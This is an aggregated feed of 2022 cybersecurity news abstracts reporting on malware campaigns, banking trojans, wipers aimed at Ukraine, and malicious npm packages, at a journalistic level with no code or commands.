Cybersecurity researchers have shed more light on a malicious loader that runs as a server and executes received modules in memory, laying bare the structure of an "advanced multi-layered virtual machine" used by the malware to fly under the radar. Wslink, as the malicious loader is called, was first documented by Slovak cybersecurity company ESET in October 2021, with very few telemetry hits detected in the past two years spanning Central Europe, North America, and the Middle East. Analysis of the malware samples have yielded little to no clues about the initial compromise vector used, and no code, functionality, or operational similarities have been uncovered to suggest that this is a tool from a previously identified threat actor. Packed with a file compression utility named NsPack, Wslink makes use of what's called a process virtual machine (VM), a mechanism to run an application in a platform-independent manner that abstracts the underlying hardware or operaThe Hacker News
March 29, 2022
Verblecon malware loader used in stealthy crypto mining attacks Full Text
Abstract
Security researchers are warning of a relatively new malware loader, that they track as Verblecon, which is sufficiently complex and powerful for rannsomware and erespionage attacks, although it is currently used for low-reward attacks.BleepingComputer
March 28, 2022
Update: Hundreds more packages found in malicious npm ‘factory’ Full Text
Abstract
On Monday, Checkmarx researchers said they have also been tracking these activities and have recorded over 600 malicious packages published over five days, bringing the total to over 700.ZDNet
March 28, 2022
Malware-as-a-Service Gains Prominence in Threat Landscape Full Text
Abstract
While organizations have improved their backup strategy, ransomware groups are responding by exfiltrating sensitive data and threatening to expose it. Cybercriminals are still shifting to living-off-the-land attack techniques.Cyware Alerts - Hacker News
March 25, 2022
Storm Cloud Attempting To GIMMICK macOS Users Full Text
Abstract
Volexity discovered a newly discovered macOS variant of Gimmick, a malware implant developed by a Chinese group tracked as Storm Cloud. It is targeting organizations across Asia. The samples of the GIMMICK malware are large and complex, which suggests the threat actor behind it seems to be well res ... Read MoreCyware Alerts - Hacker News
March 24, 2022
Microsoft Help Files Disguise Vidar Malware Full Text
Abstract
Attackers are hiding interesting malware in a boring place, hoping victims won’t bother to look.Threatpost
March 24, 2022
How to Build a Custom Malware Analysis Sandbox Full Text
Abstract
Before hunting malware, every researcher needs to find a system where to analyze it. There are several ways to do it: build your own environment or use third-party solutions. Today we will walk through all the steps of creating a custom malware sandbox where you can perform a proper analysis without infecting your computer. And then compare it with a ready-made service. Why do you need a malware sandbox? A sandbox allows detecting cyber threats and analyzing them safely. All information remains secure, and a suspicious file can't access the system. You can monitor malware processes, identify their patterns and investigate behavior. Before setting up a sandbox, you should have a clear goal of what you want to achieve through the lab. There are two ways how to organize your working space for analysis: Custom sandbox. Made from scratch by an analyst on their own, specifically for their needs. A turnkey solution. A versatile service with a range of configurations to meet yoThe Hacker News
March 24, 2022
Over 200 Malicious NPM Packages Caught Targeting Azure Developers Full Text
Abstract
A new large scale supply chain attack has been observed targeting Azure developers with no less than 218 malicious NPM packages with the goal of stealing personal identifiable information. "After manually inspecting some of these packages, it became apparent that this was a targeted attack against the entire @azure NPM scope , by an attacker that employed an automatic script to create accounts and upload malicious packages that cover the entirety of that scope," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a new report. The entire set of malicious packages was disclosed to the NPM maintainers roughly two days after they were published, leading to their quick removal, but not before each of the packages were downloaded around 50 times on average. The attack refers to what's called typosquatting, which takes place when bad actors push rogue packages with names mimicking legitimate libraries to a public software registry such as NPM or PyPI witThe Hacker News
March 24, 2022
Malicious Microsoft Excel add-ins used to deliver RAT malware Full Text
Abstract
Researchers report a new version of the JSSLoader remote access trojan being distributed malicious Microsoft Excel addins.BleepingComputer
March 24, 2022
Vidar spyware is now hidden in Microsoft help files Full Text
Abstract
According to Trustwave, the email campaign distributing Vidar is not very sophisticated. The email contains a generic subject line and an attachment, "request.doc," which is actually a .iso disk image.ZDNet
March 23, 2022
BitRAT Spreads as Windows Activator Full Text
Abstract
A new BitRAT malware campaign is leveraging illegal crack tools for Windows 10 license verification. The campaign targets users looking to activate pirated Windows OS versions on webhards for free. BitRAT supports generic keylogging, audio recording, clipboard monitoring, credential theft from web ... Read MoreCyware Alerts - Hacker News
March 23, 2022
New Variant of Chinese Gimmick Malware Targeting macOS Users Full Text
Abstract
Researchers have disclosed details of a newly discovered macOS variant of a malware implant developed by a Chinese espionage threat actor known to strike attack organizations across Asia. Attributing the attacks to a group tracked as Storm Cloud , cybersecurity firm Volexity characterized the new malware, dubbed Gimmick , a "feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google Drive) for command-and-control (C2) channels." The cybersecurity firm said it recovered the sample through memory analysis of a compromised MacBook Pro running macOS 11.6 (Big Sur) as part of an intrusion campaign that took place in late 2021. "Storm Cloud is an advanced and versatile threat actor, adapting its tool set to match different operating systems used by its targets," Volexity researchers Damien Cash, Steven Adair, and Thomas Lancaster said in a report. "They make use of built-in operating system utilities, open-source tooThe Hacker News
March 23, 2022
Slithering Serpent - New Backdoor and a Unique Attack Chain Full Text
Abstract
An unknown and likely sophisticated threat actor is leveraging a unique amalgamation of open-source software, a detection bypass technique, and steganography to attack French entities.Cyware Alerts - Hacker News
March 23, 2022
DirtyMoe Modules Introduce Worm-Like Features Full Text
Abstract
Avast researchers have observed three main ways in which the malware is being disseminated - PurpleFox EK, PurpleFox Worm, and injected Telegram installers. It is likely that the malware propagates through other methods too.Cyware Alerts - Hacker News
March 23, 2022
New JSSLoader Trojan Delivered Through XLL Files Full Text
Abstract
Attackers are now using .XLL files to deliver a new, obfuscated version of JSSLoader. This new malware variant utilizes the Excel add-ins feature to load the malware and inspect the changes inside.Morphisec
March 22, 2022
Custom macOS malware of Chinese hackers ‘Storm Cloud’ exposed Full Text
Abstract
Researchers have discovered a previously unknown macOS malware variant called GIMMICK, which is believed to be a custom tool used by a Chinese espionage threat actor known as 'Storm Cloud.'BleepingComputer
March 21, 2022
BitRAT malware now spreading as a Windows 10 license activator Full Text
Abstract
A new BitRAT malware distribution campaign is underway, exploiting users looking to activate pirated Windows OS versions for free using unofficial Microsoft license activators.BleepingComputer
March 21, 2022
Android password-stealing malware infects 100,000 Google Play users Full Text
Abstract
A malicious Android app that steals Facebook credentials has been installed over 100,000 times via the Google Play Store, with the app still available to download.BleepingComputer
March 21, 2022
Gh0stCringe Targets Weakly Configured Microsoft SQL, MySQL Servers Full Text
Abstract
AhnLab found a malware threat dubbed Gh0stCringe targeting Oracle's open-source MySQL and Microsoft's SQL Server by abusing weak user credentials. Moreover, researchers have identified multiple malware samples—such as KingMiner and Vollgar CoinMiner—on the targeted servers. Experts say frequen ... Read MoreCyware Alerts - Hacker News
March 21, 2022
New Backdoor Targets French Entities via Open-Source Package Installer Full Text
Abstract
Researchers have exposed a new targeted email campaign aimed at French entities in the construction, real estate, and government sectors that leverages the Chocolatey Windows package manager to deliver a backdoor called Serpent on compromised systems. Enterprise security firm Proofpoint attributed the attacks to a likely advanced threat actor based on the tactics and the victimology patterns observed. The ultimate objective of the campaign remains presently unknown. "The threat actor attempted to install a backdoor on a potential victim's device, which could enable remote administration, command and control (C2), data theft, or deliver other additional payloads," Proofpoint researchers said in a report shared with The Hacker News. The phishing lure that triggers the infection sequence makes use of a resume-themed subject line, with the attached macro-embedded Microsoft Word document masquerading as information related to the European Union's General Data ProtThe Hacker News
March 21, 2022
Influx of Trojanized Apps on Google Play Store Full Text
Abstract
Dr.Web disclosed numerous trojanized apps on Google Play Store prompting potential victims to take action, such as depositing money for trading or signing up for expensive subscriptions, benefitting the scammers eventually. The detected malicious apps include SecretVideoRecorder, FakeAntiVirus, Key ... Read MoreCyware Alerts - Hacker News
March 17, 2022
Kwampirs Malware Linked with Shamoon Full Text
Abstract
Security experts linked the activities of Shamoon APT with those behind Kwapirs malware. They said both could be from the same group as they have been collaborating, sharing updates, techniques, and codes for years. Organizations should be ready with countermeasures including reliable anti-malware ... Read MoreCyware Alerts - Hacker News
March 17, 2022
ASUS warns of Cyclops Blink malware attacks targeting routers Full Text
Abstract
Multiple ASUS router models are vulnerable to the Russia-linked Cyclops Blink malware threat, causing the vendor to publish an advisory with mitigations for the security risk.BleepingComputer
March 17, 2022
TrickBot Malware Abusing MikroTik Routers as Proxies for Command-and-Control Full Text
Abstract
Microsoft on Wednesday detailed a previously undiscovered technique put to use by the TrickBot malware that involves using compromised Internet of Things (IoT) devices as a go-between for establishing communications with the command-and-control (C2) servers. "By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, TrickBot adds another persistence layer that helps malicious IPs evade detection by standard security systems," Microsoft's Defender for IoT Research Team and Threat Intelligence Center (MSTIC) said . TrickBot, which emerged as a banking trojan in 2016, has evolved into a sophisticated and persistent threat, with its modular architecture enabling it to adapt its tactics to suit different networks, environments, and devices as well as offer access-as-a-service for next-stage payloads like Conti ransomware. The expansion to TrickBot's capabilities comes amid reports of its infrastructure goinThe Hacker News
March 15, 2022
Raccoon Stealer Using Telegram for Hidden Communications Full Text
Abstract
The credential-stealing Raccoon Stealer is spotted using the chat app to store and update C2 addresses as adversaries find creative new ways to distribute the malware. The cybercriminals are attempting to evade detection by packing the credential stealer, using Themida or malware packers. Expe ... Read MoreCyware Alerts - Hacker News
March 15, 2022
Lampion Trojan Returns with its Old Attack Infrastructure Full Text
Abstract
One of the most active banking trojans has been spotted tweaking its technique but using the same old infrastructure to target its victims in banking the sector. The attackers use fake banking templates impersonating Portuguese organizations to bait victims. Organizations are recommended to ma ... Read MoreCyware Alerts - Hacker News
March 15, 2022
CaddyWiper: Yet Another Data Wiping Malware Targeting Ukrainian Networks Full Text
Abstract
Two weeks after details emerged about a second data wiper strain delivered in attacks against Ukraine, yet another destructive malware has been detected amid Russia's continuing military invasion of the country. Slovak cybersecurity company ESET dubbed the third wiper " CaddyWiper ," which it said it first observed on March 14 around 9:38 a.m. UTC. Metadata associated with the executable (" caddy.exe ") shows that the malware was compiled at 7:19 a.m. UTC, a little over two hours prior to its deployment. CaddyWiper is notable for the fact that it doesn't share any similarities with previously discovered wipers in Ukraine, including HermeticWiper (aka FoxBlade or KillDisk) and IsaacWiper (aka Lasainraw), the two of which have been deployed in systems belonging to government and commercial entities. "The ultimate goal of the attackers is the same as with IsaacWiper and HermeticWiper: make the systems unusable by erasing user data and partition iThe Hacker News
March 15, 2022
Android trojan persists on the Google Play Store since January Full Text
Abstract
Security researchers tracking the mobile app ecosystem have noticed a recent spike in trojan infiltration on the Google Play Store, with one of the apps having over 500,000 installs.BleepingComputer
March 14, 2022
Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats Full Text
Abstract
Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats Introduction A new variant of a Brazilian trojan has impacted Internet end users in Portugal since last month (February 2022). Although...Security Affairs
March 13, 2022
The hidden C2: Lampion trojan release 212 is on the rise and using a C2 server for two years Full Text
Abstract
The hidden C2: Lampion trojan release 212 is on the rise and using a C2 server for two years. Lampion trojan is one of the most active banking trojans impacting Portuguese Internet end users since 2019. This piece of malware is known for the usage...Security Affairs
March 12, 2022
Android malware Escobar steals your Google Authenticator MFA codes Full Text
Abstract
The Aberebot banking trojan appears to have returned, as its author is actively promoting a new version of the tool on dark web markets and forums.BleepingComputer
March 10, 2022
Corporate website contact forms used to spread BazarBackdoor malware Full Text
Abstract
The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software.BleepingComputer
March 10, 2022
Qakbot injects itself into the middle of your conversations Full Text
Abstract
The messages generally contain brief text content, followed by a link to download a zip archive. These links may be “bare URLs” like above, or hot-linked text in the message body.Sophos
March 10, 2022
Malware disguised as security tool targets Ukraine’s IT Army Full Text
Abstract
A new malware distribution campaign has surfaced, taking advantage of the willingness of a large number of people to support Ukraine in the ongoing cyber warfare to infect them with info-stealers.BleepingComputer
March 10, 2022
Raccoon Stealer: “Trash panda” abuses Telegram Full Text
Abstract
Avast researchers came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses.Avast
March 7, 2022
SharkBot, the new generation banking Trojan distributed via Play Store Full Text
Abstract
SharkBot banking malware was able to evade Google Play Store security checks masqueraded as an antivirus app. SharkBot is a banking trojan that has been active since October 2021, it allows to steal banking account credentials and bypass multi-factor...Security Affairs
March 7, 2022
Beware of malware offering “Warm greetings from Saudi Aramco” Full Text
Abstract
Malwarebytes found a Formbook campaign targeting oil and gas companies. The campaign was delivered through targeted emails containing two attachments, a PDF file and an Excel document.Malwarebytes Labs
March 06, 2022
SharkBot Banking Malware Spreading via Fake Android Antivirus App on Google Play Store Full Text
Abstract
The threat actor behind a nascent Android banking trojan named SharkBot has managed to evade Google Play Store security barriers by masquerading as an antivirus app. SharkBot, like its malware counterparts TeaBot , FluBot , and Oscorp (UBEL), belongs to a category of financial trojans capable of siphoning credentials to initiate money transfers from compromised devices by circumventing multi-factor authentication mechanisms. It first emerged on the scene in November 2021. Where SharkBot stands apart is in its ability to carry out the unauthorized transactions via Automatic Transfer Systems (ATS), which stands in contrast to TeaBot, which requires a live operator to interact with the infected devices to conduct the malicious activities. "The ATS features allow the malware to receive a list of events to be simulated, and they will be simulated in order to do the money transfers," Alberto Segura and Rolf Govers, malware analysts at cybersecurity firm NCC Group, saidThe Hacker News
March 05, 2022
Malware now using NVIDIA’s stolen code signing certificates Full Text
Abstract
Threat actors are using stolen NVIDIA code signing certificates to sign malware to appear trustworthy and allow malicious drivers to be loaded in Windows.BleepingComputer
March 05, 2022
SharkBot malware hides as Android antivirus in Google Play Full Text
Abstract
The banking trojan tracked as SharkBot has infiltrated the Google Play Store, Android's official and most trusted app store, posing as an antivirus and system cleaner application.BleepingComputer
March 5, 2022
Conti’s Source Code Now Publicly Available Full Text
Abstract
The Russia-Ukraine cyberwar continues to evolve, with a researcher leaking a big chunk of internal messages and source code associated with the Conti ransomware group. The leak includes how the threat actors are organized like a business, how they avoid law enforcement, and much more. Meanwhile, so ... Read MoreCyware Alerts - Hacker News
March 4, 2022
Highly Sophisticated FoxBlade Malware Targets Ukrainian Networks Full Text
Abstract
Microsoft laid bare a cyberattack effort involving the FoxBlade malware, which was launched against Ukraine hours before Russia’s tanks and missiles began to hit the country. Upon understanding the threat it poses, the firm provided technical advice on how to identify and mitigate the enclosed ... Read MoreCyware Alerts - Hacker News
March 4, 2022
The New Daxin Network Attack Tool has a Chinese Link Full Text
Abstract
The CISA and Symantec laid bare Daxin, a stealthy backdoor linked to a Chinese hacker group. The highly sophisticated rootkit was used against select governments and other critical infrastructure targets. Organizations are suggested to make use of IOCs that may help in the detection of malicious ac ... Read MoreCyware Alerts - Hacker News
March 04, 2022
Russia-Ukraine war exploited as lure for malware distribution Full Text
Abstract
Threat actors are distributing malware using phishing themes related to the invasion of Ukraine, aiming to infect their targets with remote access trojans (RATs) such as Agent Tesla and Remcos.BleepingComputer
March 2, 2022
TeaBot Trojan Haunts Google Play Store, Again Full Text
Abstract
Malicious Google Play apps have circumvented censorship by hiding trojans in software updates.Threatpost
March 01, 2022
TeaBot Android Banking Malware Spreads Again Through Google Play Store Apps Full Text
Abstract
An Android banking trojan designed to steal credentials and SMS messages has been observed once again sneaking past Google Play Store protections to target users of more than 400 banking and financial apps, including those from Russia, China, and the U.S. "TeaBot RAT capabilities are achieved via the device screen's live streaming (requested on-demand) plus the abuse of Accessibility Services for remote interaction and key-logging," Cleafy researchers said in a report. "This enables Threat Actors (TAs) to perform ATO (Account Takeover) directly from the compromised phone, also known as 'On-device fraud.'" Also known by the name Anatsa, TeaBot first emerged in May 2021, camouflaging its malicious functions by posing as seemingly innocuous PDF document and QR code scanner apps that are distributed via the official Google Play Store instead of third-party apps stores or via fraudulent websites. These apps, also known as dropper applications, act aThe Hacker News
March 1, 2022
IsaacWiper, the third wiper spotted since the beginning of the Russian invasion Full Text
Abstract
IsaacWiper, a new data wiper was used against an unnamed Ukrainian government network after Russia's invasion of Ukraine. ESET researchers uncovered a new data wiper, tracked as IsaacWiper, that was used against an unnamed Ukrainian government network...Security Affairs
March 1, 2022
Daxin Espionage Backdoor Ups the Ante on Chinese Malware Full Text
Abstract
Via node-hopping, the espionage tool can reach computers that aren’t even connected to the internet.Threatpost
March 01, 2022
TeaBot malware slips back into Google Play Store to target US users Full Text
Abstract
The TeaBot banking trojan was spotted once again in Google Play Store where it posed as a QR code app and spread to more than 10,000 devices.BleepingComputer
February 28, 2022
Chinese cyberspies target govts with their ‘most advanced’ backdoor Full Text
Abstract
Security researchers have discovered Daxin, a China-linked stealthy backdoor specifically designed for deployment in hardened corporate networks that feature advanced threat detection capabilities.BleepingComputer
February 28, 2022
Malicious Package Imitates Python Server Library to Spy on Users and Maintain Remote System Control Full Text
Abstract
The legitimate AIOHTTP library is a popular asynchronous HTTP Client/Server for the asyncio library and Python-based applications. The component receives over 9 million weekly downloads on average.Sonatype
February 27, 2022
Iranian Hackers Using New Spying Malware That Abuses Telegram Messenger API Full Text
Abstract
An Iranian geopolitical nexus threat actor has been uncovered deploying two new targeted malware that come with "simple" backdoor functionalities as part of an intrusion against an unnamed Middle East government entity in November 2021. Cybersecurity company Mandiant attributed the attack to an uncategorized cluster it's tracking under the moniker UNC3313 , which it assesses with "moderate confidence" as associated with the MuddyWater state-sponsored group. "UNC3313 conducts surveillance and collects strategic information to support Iranian interests and decision-making," researchers Ryan Tomcik, Emiel Haeghebaert, and Tufail Ahmed said . "Targeting patterns and related lures demonstrate a strong focus on targets with a geopolitical nexus." In mid-January 2022, U.S. intelligence agencies characterized MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros, or Mercury) as a subordinate element of the Iranian Ministry of Intelligence andThe Hacker News
February 26, 2022
Social Media Hijacking Malware Spreading Through Gaming Apps on Microsoft Store Full Text
Abstract
A new malware capable of controlling social media accounts is being distributed through Microsoft's official app store in the form of trojanized gaming apps, infecting more than 5,000 Windows machines in Sweden, Bulgaria, Russia, Bermuda, and Spain. Israeli cybersecurity company Check Point dubbed the malware "Electron Bot," in reference to a command-and-control (C2) domain used in recent campaigns. The identity of the attackers is not known, but evidence suggests that they could be based out of Bulgaria. "Electron Bot is a modular SEO poisoning malware, which is used for social media promotion and click fraud," Check Point's Moshe Marelus said in a report published this week. "It is mainly distributed via the Microsoft store platform and dropped from dozens of infected applications, mostly games, which are constantly uploaded by the attackers." The first sign of malicious activity commenced as an ad clicker campaign that was discovered in OThe Hacker News
February 26, 2022
Fileless SockDetour backdoor targets U.S.-based defense contractors Full Text
Abstract
Researchers provided details about a stealthy custom malware dubbed SockDetour that targeted U.S.-based defense contractors. Cybersecurity researchers from Palo Alto Networks' Unit 42 have analyzed a previously undocumented and custom backdoor tracked...Security Affairs
February 25, 2022
New “SockDetour” Fileless, Socketless Backdoor Targets U.S. Defense Contractors Full Text
Abstract
Cybersecurity researchers have taken the wraps off a previously undocumented and stealthy custom malware called SockDetour that targeted U.S.-based defense contractors with the goal of being used as a secondary implant on compromised Windows hosts. "SockDetour is a backdoor that is designed to remain stealthily on compromised Windows servers so that it can serve as a backup backdoor in case the primary one fails," Palo Alto Networks' Unit 41 threat intelligence said in a report published Thursday. "It is difficult to detect, since it operates filelessly and socketlessly on compromised Windows servers." Even more concerningly, SockDetour is believed to have been used in attacks since at least July 2019, based on a compilation timestamp on the sample, implying that the backdoor successfully managed to slip past detection for over two-and-a-half years. The attacks have been attributed to a threat cluster it tracks as TiltedTemple (aka DEV-0322 by MicrosofThe Hacker News
February 25, 2022
US and UK details a new Python backdoor used by MuddyWater APT group Full Text
Abstract
US and UK cybersecurity agencies provided details of a new malware used by Iran-linked MuddyWater APT. CISA, the FBI, the US Cyber Command's Cyber National Mission Force (CNMF), UK's National Cyber Security Centre (NCSC-UK), and the NSA, and law enforcement...Security Affairs
February 25, 2022
Jester Stealer malware adds more capabilities to entice hackers Full Text
Abstract
An infostealing piece of malware called Jester Stealer has been gaining popularity in the underground cybercrime community for its functionality and affordable prices.BleepingComputer
February 24, 2022
Microsoft App Store Sizzling with New ‘Electron Bot’ Malware Full Text
Abstract
The SEO poisoning bot, capable of full system takeover, is actively taking over social media accounts, masquerading as popular games like Temple Run.Threatpost
February 24, 2022
US and UK expose new malware used by MuddyWater hackers Full Text
Abstract
US and UK cybersecurity and law enforcement agencies today shared info on new malware deployed by the Iranian-backed MuddyWatter hacking group in attacks targeting critical infrastructure worldwide.BleepingComputer
February 24, 2022
New Wiper Malware HermeticWiper targets Ukrainian systems Full Text
Abstract
Cybersecurity experts discovered a new data wiper malware that was used in attacks against hundreds of machines in Ukraine. The threat of hybrid warfare is reality, Russia-linked APT group have supported the operations of the Russian army while...Security Affairs
February 24, 2022
Malware infiltrates Microsoft Store via clones of popular games Full Text
Abstract
A malware named Electron Bot has found its way into Microsoft's Official Store through clones of popular games such as Subway Surfer and Temple Run, leading to the infection of 5,000 computers in Sweden, Israel, Spain, and Bermuda.BleepingComputer
February 23, 2022
New Wiper Malware Targeting Ukraine Amid Russia’s Military Operation Full Text
Abstract
Cybersecurity firms ESET and Broadcom's Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country. The Slovak company dubbed the wiper " HermeticWiper " (aka KillDisk.NCV ), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months. "The wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd," ESET said in a series of tweets. "The wiper abuses legitimate drivers from the EaseUS Partition Master software in order to corrupt data. As a final step the wiper reboots [the] computer." Specifically, HermeticWiper is delivered via the benign but signed EaseUS partition management driver that then proceeds to impair the first 512 bytes, the Master Boot Record ( MBR ) for every physThe Hacker News
February 23, 2022
Dridex Malware Deploying Entropy Ransomware on Hacked Computers Full Text
Abstract
Similarities have been unearthed between the Dridex general-purpose malware and a little-known ransomware strain called Entropy , suggesting that the operators are continuing to rebrand their extortion operations under a different name. "The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands (API calls), and in the subroutines used to decrypt encrypted text," cybersecurity firm Sophos said in a report shared with The Hacker News. The commonalities were uncovered following two unrelated incidents targeting an unnamed media company and a regional government agency. In both cases, the deployment of Entropy was preceded by infecting the target networks with Cobalt Strike Beacons and Dridex, granting the attackers remote access. Despite consistency in some aspects of the twin attacks, they also varied significantly with regards to the initial access vector used to worm their way insThe Hacker News
February 23, 2022
New Variant of CryptBot Targets All Chrome Versions Full Text
Abstract
Security experts spotted a new version of the CryptBot infostealer that is offering free download versions of cracked games and pro-grade software. Its operators are using search engine optimization to rank up the distribution sites to display them at top of Google search results, allowing increase ... Read MoreCyware Alerts - Hacker News
February 23, 2022
Chinese Experts Uncover Details of Equation Group’s Bvp47 Covert Hacking Tool Full Text
Abstract
Researchers from China's Pangu Lab have disclosed details of a "top-tier" backdoor put to use by the Equation Group , an advanced persistent threat (APT) with alleged ties to the cyber-warfare intelligence-gathering unit of the U.S. National Security Agency (NSA). Dubbed " Bvp47 " owing to numerous references to the string "Bvp" and the numerical value "0x47" used in the encryption algorithm, the backdoor was extracted from Linux systems "during an in-depth forensic investigation of a host in a key domestic department" in 2013. Pangu Lab codenamed the attacks involving the deployment of Bvp47 "Operation Telescreen," with the implant featuring an "advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design." The Shadow Brokers leaks Equation Group , designated as the " crown creator of cyber espionage " by Russian security firm Kaspersky, iThe Hacker News
February 23, 2022
Xenomorph Trojan Spreading via Play Store Full Text
Abstract
A new banking trojan called Xenomorph was found distributing via Google Play Store in the form of fake performance-boosting apps, targeting European banks. It comes with a modular engine that abuses accessibility services, which may allow advanced capabilities. Experts recommend using an anti-malwa ... Read MoreCyware Alerts - Hacker News
February 22, 2022
25 Malicious JavaScript Libraries Distributed via Official NPM Package Repository Full Text
Abstract
Another batch of 25 malicious JavaScript libraries have made their way to the official NPM package registry with the goal of stealing Discord tokens and environment variables from compromised systems, more than two months after 17 similar packages were taken down. The libraries in question leveraged typosquatting techniques and masqueraded as other legitimate packages such as colors.js, crypto-js, discord.js, marked, and noblox.js , DevOps security firm JFrog said, attributing the packages as the work of "novice malware authors." The complete list of packages is below – node-colors-sync (Discord token stealer) color-self (Discord token stealer) color-self-2 (Discord token stealer) wafer-text (Environment variable stealer) wafer-countdown (Environment variable stealer) wafer-template (Environment variable stealer) wafer-darla (Environment variable stealer) lemaaa (Discord token stealer) adv-discord-utility (Discord token stealer) tools-for-discord (Discord tThe Hacker News
February 21, 2022
New Android Banking Trojan Spreading via Google Play Store Targets Europeans Full Text
Abstract
A new Android banking trojan with over 50,000 installations has been observed distributed via the official Google Play Store with the goal of targeting 56 European banks and carrying out harvesting sensitive information from compromised devices. Dubbed Xenomorph by Dutch security firm ThreatFabric, the in-development malware is said to share overlaps with another banking trojan tracked under the moniker Alien while also being "radically different" from its predecessor in terms of the functionalities offered. "Despite being a work-in-progress, Xenomorph is already sporting effective overlays and being actively distributed on official app stores," ThreatFabric's founder and CEO, Han Sahin, said. "In addition, it features a very detailed and modular engine to abuse accessibility services, which in the future could power very advanced capabilities, like ATS." Alien, a remote access trojan (RAT) with notification sniffing and authenticator-based 2FAThe Hacker News
February 21, 2022
Xenomorph Android banking trojan distributed via Google Play Store Full Text
Abstract
Xenomorph Android trojan has been observed distributed via the official Google Play Store targeting 56 European banks. Researchers from ThreatFabric have spotted a new Android banking trojan, dubbed Xenomorph, distributed via the official Google...Security Affairs
February 21, 2022
Revamped CryptBot malware spread by pirated software sites Full Text
Abstract
A new version of the CryptBot info stealer was seen in distribution via multiple websites that offer free downloads of cracks for games and pro-grade software.BleepingComputer
February 18, 2022
The Week in Ransomware - February 18th 2022 - Mergers & Acquisitions Full Text
Abstract
The big news this week is that the Conti ransomware gang has recruited the core developers and managers of the TrickBot group, the developers of the notorious TrickBot malware.BleepingComputer
February 18, 2022
PseudoManuscrypt Malware Spreading the Same Way as CryptBot Targets Koreans Full Text
Abstract
Numerous Windows machines located in South Korea have been targeted by a botnet tracked as PseudoManuscrypt since at least May 2021 by employing the same delivery tactics of another malware called CryptBot . "PseudoManuscrypt is disguised as an installer that is similar to a form of CryptBot , and is being distributed," South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published today. "Not only is its file form similar to CryptBot, but it is also distributed via malicious sites exposed on the top search page when users search commercial software-related illegal programs such as Crack and Keygen," it added. According to ASEC, around 30 computers in the country are being consistently infected on a daily basis on average. PseudoManuscrypt was first documented by Russian cybersecurity firm Kaspersky in December 2021, when it disclosed details of a "mass-scale spyware attack campaign" infecting morThe Hacker News
February 16, 2022
Trickbot Malware Targeted Customers of 60 High-Profile Companies Since 2020 Full Text
Abstract
The notorious TrickBot malware is targeting customers of 60 financial and technology companies, including cryptocurrency firms, primarily located in the U.S., even as its operators have updated the botnet with new anti-analysis features. "TrickBot is a sophisticated and versatile malware with more than 20 modules that can be downloaded and executed on demand," Check Point researchers Aliaksandr Trafimchuk and Raman Ladutska said in a report published today. In addition to being both prevalent and persistent, TrickBot has continually evolved its tactics to go past security and detection layers. To that end, the malware's "injectDll" web-injects module, which is responsible for stealing banking and credential data, leverages anti-deobfuscation techniques to crash the web page and thwart attempts to scrutinize the source code. Also put in place are anti-analysis guardrails to prevent security researchers from sending automated requests to command-and-conThe Hacker News
February 16, 2022
Emotet Malware Spreads by Hijacking Email Threats and Luring Users with Malicious Attachments Full Text
Abstract
As early as December 21, 2021, researchers from Palo Alto Networks' Unit 42 observed a new infection method for the highly prevalent malware family Emotet involving thread hijacking.Palo Alto Networks
February 15, 2022
New MyloBot Malware Variant Sends Sextortion Emails Demanding $2,732 in Bitcoin Full Text
Abstract
A new version of the MyloBot malware has been observed to deploy malicious payloads that are being used to send sextortion emails demanding victims to pay $2,732 in digital currency. MyloBot , first detected in 2018, is known to feature an array of sophisticated anti-debugging capabilities and propagation techniques to rope infected machines into a botnet, not to mention remove traces of other competing malware from the systems. Chief among its methods to evade detection and stay under the radar included a delay of 14 days before accessing its command-and-control servers and the facility to execute malicious binaries directly from memory. MyloBot also leverages a technique called process hollowing , wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses. This is achieved by unmapping the memory allocated to the live process and replacing it with the arbitrary code to be executed, in this case a decoded resource fiThe Hacker News
February 14, 2022
‘Cities: Skylines’ Gaming Modder Banned Over Hidden Malware Full Text
Abstract
35K+ players were exposed to an auto-updater that planted a trojan that choked performance for fellow modders and Colossal Order employees.Threatpost
February 10, 2022
Qbot, Lokibot malware switch back to Windows Regsvr32 delivery Full Text
Abstract
Malware distributors have turned to an older trick known as Squiblydoo to spread Qbot and Lokibot via Microsoft Office document using regsvr32.exe.BleepingComputer
February 9, 2022
StellarParticle Campaign - New Undetected Malware Revealed After Two Years Full Text
Abstract
Hackers associated with SolarWind attacks have been using two new threats, the GoldMax backdoor and the TrailBlazer malware family, in StellarParticle campaigns for over two years. Researchers have provided detailed information regarding the latest TTPs observed in cyberattacks and sugge ... Read MoreCyware Alerts - Hacker News
February 09, 2022
Fake Windows 11 upgrade installers infect you with RedLine malware Full Text
Abstract
Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware.BleepingComputer
February 8, 2022
BazarBackdoor Spreads via Malicious CSV Files Full Text
Abstract
Cybercriminals have found a way to abuse text-based CSV files in a phishing campaign that pretends to be Payment Remittance Advice to install BazarBackdoor malware on users' systems. In the past two days, researchers have spotted 102 actual non-sandbox corporations, along with government victims. O ... Read MoreCyware Alerts - Hacker News
February 08, 2022
Several Malware Families Using Pay-Per-Install Service to Expand Their Targets Full Text
Abstract
